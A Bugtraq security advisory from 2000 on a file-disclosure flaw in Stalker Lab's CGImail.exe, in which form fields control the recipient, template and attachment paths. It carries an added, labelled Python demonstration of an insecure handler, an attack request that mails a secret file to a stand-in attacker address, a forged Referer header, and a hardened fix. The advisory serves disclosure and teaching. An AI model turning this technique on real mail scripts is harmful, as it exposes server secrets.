Bugtraq mailing list archives

Stalker's CGImail Gives Read Access to All Server Files


From: "Sverre H. Huseby" <shh () THATHOST COM>
Date: Tue, 29 Aug 2000 19:46:18 +0200

Stalker's CGImail Gives Read Access to All Server Files
-------------------------------------------------------

Stalker Lab's Mailers package for Windows NT contains the CGImail.exe
program, which is used to convert the contents of an HTML form to an
email.  The program takes a template file on the web server disk, and
substitutes special markup ("variables") with values from the form
before sending the mail.  Attachments are also supported.

Unfortunately, every part of the mail sending process is controlled by
(possibly hidden) values in the form.  A malicious user may thus save
the web page to disk, modify the recipient ($To$) variable and the
template ($File$) or attachment ($Attach$) variable, and trick the
program into mailing any file on the web server disk to himself.

I have tested this positively on an unknown version of CGImail.exe
(web server outside of my control, problem since fixed by removing
CGImail.exe).  The docs (cgimail.txt) for version 1.12 (1996-12-17)
available from http://www.winsite.com/info/pc/winnt/netutil/sm112.zip/
indicate that the same problem exists with that version.  The Stalker
Lab web page at http://www.stalkerlab.ch/SMailers/index.html is
unreachable (No route to host), but a cached version at Google shows
that a version of at least 1.20 is now available.  I have not been
able to find that version anywhere on the net.

The 1.12 docs have a section about "security": CGImail.exe may use the
CGI HTTP_REFERER environment variable to make sure the page containing
the form comes from the correct web server.  The Referer header is
supplied by the client, so an attacker simply sends whatever value the
check expects; this provides only a false sense of security.

No solution to the problem is known, except for disabling (and
deleting!) the program entirely.
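The two points above, the form-controlled template/attachment path and the
forgeable Referer check, in a small form-to-mail handler written for this
note.  This is added example code, not Stalker's CGImail or anything taken
from its docs; the function names, the sandbox directory, the fixed
recipient and the "Template" field of the hardened variant are this
example's own, chosen to mirror the $To$/$File$/$Attach$ markup the
advisory describes.

```python
"""Form-to-mail handler in the style CGImail is described as using, in two
variants, plus the Referer "check".  Added example; not Stalker's code."""
import os
import re
import tempfile
from email.message import EmailMessage
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Constructed sandbox standing in for the web server disk.
ROOT = Path(tempfile.mkdtemp())
TEMPLATE_DIR = ROOT / "templates"
TEMPLATE_DIR.mkdir()
(TEMPLATE_DIR / "contact.txt").write_text("Hello $Name$, thanks for writing.\n")
SECRET = ROOT / "secret.ini"            # a file that should never leave the box
SECRET.write_text("DbPassword=hunter2\n")


def substitute(template: str, fields: dict) -> str:
    """Replace $Var$ markup with form values (empty string when missing)."""
    return re.sub(r"\$(\w+)\$", lambda m: fields.get(m.group(1), ""), template)


def parse_form(body: str) -> dict:
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def mail_text(msg: EmailMessage) -> str:
    """Body text plus any attachments, decoded, so a test can see what leaked."""
    if not msg.is_multipart():
        return msg.get_content()
    parts = [msg.get_body().get_content()]
    for att in msg.iter_attachments():
        parts.append(att.get_content().decode())
    return "".join(parts)


def build_mail_insecure(body: str) -> EmailMessage:
    """Every part of the mail comes from form fields, as the advisory describes."""
    f = parse_form(body)
    msg = EmailMessage()
    msg["To"] = f["To"]                        # client chooses the recipient
    template = Path(f["File"]).read_text()     # client chooses the template file
    msg.set_content(substitute(template, f))
    if f.get("Attach"):                        # client chooses the attachment
        data = Path(f["Attach"]).read_bytes()
        msg.add_attachment(data, maintype="application", subtype="octet-stream",
                           filename=os.path.basename(f["Attach"]))
    return msg


def attack_body(target: Path, attach: Optional[Path] = None) -> str:
    """What the attacker posts after saving the page and editing the hidden fields."""
    fields = {"To": "attacker@evil.invalid", "File": str(target), "Name": "x"}
    if attach is not None:
        fields["Attach"] = str(attach)
    return urlencode(fields)


FIXED_RECIPIENT = "webmaster@example.invalid"   # assumed site owner address
ALLOWED_TEMPLATES = {"contact": "contact.txt"}  # server-side allowlist


def build_mail_hardened(body: str) -> EmailMessage:
    """Recipient and file names are fixed server-side; the form only fills $Var$."""
    f = parse_form(body)
    name = ALLOWED_TEMPLATES.get(f.get("Template", ""))
    if name is None:
        raise ValueError("unknown template")
    msg = EmailMessage()
    msg["To"] = FIXED_RECIPIENT
    msg.set_content(substitute((TEMPLATE_DIR / name).read_text(), f))
    return msg


def referer_check(headers: dict, expected_host: str) -> bool:
    """The measure the 1.12 docs call security: accept only if the Referer names
    our host.  The header is sent by the client, so it proves nothing."""
    return headers.get("Referer", "").startswith(f"http://{expected_host}/")


# Constructed request headers from an attacker's own tool, not from any browser.
FORGED_HEADERS = {"Referer": "http://www.example.invalid/contact.html"}
```

build_mail_insecure() mails secret.ini to the attacker either as the
"template" (its contents appear in the body, unchanged, since it contains
no $Var$ markup) or as the attachment; build_mail_hardened() ignores $To$,
$File$ and $Attach$ entirely and only accepts an allowlisted template name.
referer_check() returns True for the forged headers, which is exactly why it
is not a control.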


Sverre H. Huseby <shh () thathost com>

--
<URL:mailto:shh () thathost com>
<URL:http://shh.thathost.com/>               Echelon bait: semtex, bin Laden,
                                         plutonium, North Korea, nuclear bomb

